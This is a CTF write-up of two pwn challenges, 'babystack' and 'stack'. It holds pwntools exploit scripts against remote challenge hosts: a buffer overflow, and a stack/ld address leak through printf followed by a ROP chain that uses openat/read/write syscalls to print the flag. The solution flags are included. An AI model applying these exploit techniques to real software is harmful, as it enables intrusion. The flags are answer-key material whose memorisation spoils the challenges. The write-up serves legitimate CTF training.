# babystack
## Information
- Category: Pwn
- Points: 500
## Description
> 拿到属于你的 shell 吧<br/>
> Get your own shell
## Write-up
?
## Exploit
```python
#!/usr/bin/env python3
from pwn import (
ELF,
args,
context,
flat,
process,
raw_input,
remote,
)
FILE = "./babystack"
HOST, PORT = "pwn-10ba42cde6.challenge.xctf.org.cn", 9999
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch():
global target
if args.L:
target = process(FILE)
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
payload = flat(
b"A" * 24,
)
target.sendafter(b"flag1:", payload)
payload = flat(
b"B" * 0xF8,
0x1337ABC,
)
raw_input("DEBUG")
target.sendlineafter(b"flag2:", payload)
target.interactive()
if __name__ == "__main__":
main()
```
## Flag
:spoiler[`flag{W528uZdUsvWbiWxqon5YLvZa8x6uo8IP}`]
# stack
## Information
- Category: Pwn
- Points: 500
## Description
> 我不需要 libc,我猜你也可以不需要<br/>
> I don't need libc, and I guess you don't need it either
## Write-up
~~为了「讨好」,哦不,是「迎合」,迎合 description,我用 ld……~~
`printf` 使用 rbp 定位,可以用来泄漏栈地址和其它任意地址。
```asm showLineNumbers=false {26-27}
; Attributes: bp-based frame
; int sub_401354()
sub_401354 proc near
s= byte ptr -10h
; __unwind {
endbr64
push rbp
mov rbp, rsp
sub rsp, 10h
lea rax, [rbp+s]
mov edx, 10h ; n
mov esi, 0 ; c
mov rdi, rax ; s
call _memset
lea rax, aCouldYouTellMe ; "Could you tell me your name?"
mov rdi, rax ; s
call _puts
lea rax, [rbp+s]
mov edx, 18h ; nbytes
mov rsi, rax ; buf
mov edi, 0 ; fd
call _read
lea rax, [rbp+s]
mov rsi, rax
lea rax, format ; "Hello, %s!n"
mov rdi, rax ; format
mov eax, 0
call _printf
nop
leave
retn
; } // starts at 401354
sub_401354 endp
```
## Exploit
```python
#!/usr/bin/env python3
from pwn import (
ELF,
args,
context,
flat,
process,
raw_input,
remote,
)
FILE = "./pwn_patched"
HOST, PORT = "pwn-2229eb847f.challenge.xctf.org.cn", 9999
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch():
global target
if args.L:
target = process(FILE)
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
# raw_input("DEBUG")
target.sendafter(b"name?", b"A" * 0x10)
target.recvuntil(b"A" * 0x10)
stack = int.from_bytes(target.recv(0x6), "little")
ld = stack + 0xC0
ret = stack + 0x20
target.success(f"stack: {hex(stack)}")
payload = flat(
b"A" * 0x60,
ret + 0x60,
0x4013D4, # read
)
# raw_input("DEBUG")
target.sendafter(b"Any thing else?", payload)
payload = flat(
0x401413, # main
b"A" * 0x58,
ld + 0x10,
0x40139B, # printf
)
target.sendline(payload)
target.recvuntil(b"Hello, ")
leaked_ld = int.from_bytes(target.recv(0x6), "little") - 0x3B2E0
target.success(f"libc: {hex(leaked_ld)}")
target.sendlineafter(b"name?", b"")
flag = stack - 0xA0
payload = flat(
b"./flagx00x00",
b"A" * 0x60,
# openat
leaked_ld + 0x25E6B, # pop rdi; ret
-100,
leaked_ld + 0x54DA, # pop rsi; ret
flag,
leaked_ld + 0x20322, # pop rax; pop rdx; pop rbx; ret
0x101,
0,
0,
leaked_ld + 0x16629, # syscall; ret
# read
leaked_ld + 0x25E6B, # pop rdi; ret
0x3,
leaked_ld + 0x54DA, # pop rsi; ret
elf.bss() + 0x500,
leaked_ld + 0x20322, # pop rax; pop rdx; pop rbx; ret
0,
0x1337,
0,
leaked_ld + 0x16629, # syscall; ret
# write
leaked_ld + 0x25E6B, # pop rdi; ret
0x1,
leaked_ld + 0x54DA, # pop rsi; ret
elf.bss() + 0x500,
leaked_ld + 0x20322, # pop rax; pop rdx; pop rbx; ret
1,
0x1337,
0,
leaked_ld + 0x16629, # syscall; ret
)
raw_input("DEBUG")
target.sendafter(b"Any thing else?", payload)
target.interactive()
if __name__ == "__main__":
main()
```
## Flag
:spoiler[`flag{nfRlSH0ll0o4j4kd05IA6NJWtO8DYYSk}`]